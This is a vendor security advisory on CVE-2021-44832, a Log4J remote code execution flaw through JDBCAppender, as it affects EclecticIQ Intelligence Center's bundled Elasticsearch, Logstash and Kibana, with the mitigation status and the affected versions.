EIQ-2022-0002

ID

EIQ-2022-0002

CVE

CVE-2021-44832

Description

Log4J ≤2.17.0 is vulnerable to remote code execution through JDBCAppender if attacker can modify Log4J configuration.

Date

6 Jan 2022

Severity

1 - LOW

CVSSv3 score

6.6

Status

images/download/attachments/82475858/86c47b55d9db06e5f3aa18ff7898a3250078109be4b0ce421c77430b24576151.svg Mitigated by Elasticsearch and Logstash defaults.

Assessment

Log4J 2.17.0 and earlier are vulnerable to remote executions in a specific case where an attacker:

  1. Manages to compromise and modify Log4J configuration.

  2. Modifies Log4J configuration to load data from a malicious LDAP server.

Elastic states that Elasticsearch and Logstash are not vulnerable because defaults require an attacker to have cluster administrator permissions in order to modify Log4J configuration files and exploit this vulnerability. Elasticsearch and Logstash are susceptible only if these defaults are changed.

Kibana and Neo4J are not affected.

See Elastic’s updated security advisory for more information.

Intelligence Center (IC) versions 2.11.1, 2.10.4, and 2.9.4 come bundled with Elasticsearch, Logstash, and Kibana (ELK) 7.16.2. Users on these IC versions can upgrade from ELK 7.16.2 to 7.16.3 without having to upgrade the IC itself.

Please refer to Elastic’s advice on when ELK 7.16.3 will be available. EclecticIQ will notify IC customers when ELK 7.16.3 is available from EclecticIQ mirrors.

Mitigation

Mitigated by Elasticsearch and Logstash defaults.

Affected versions

2.11.1 and earlier; 2.10.4 and earlier; 2.9.4 and earlier.

Notes

N/A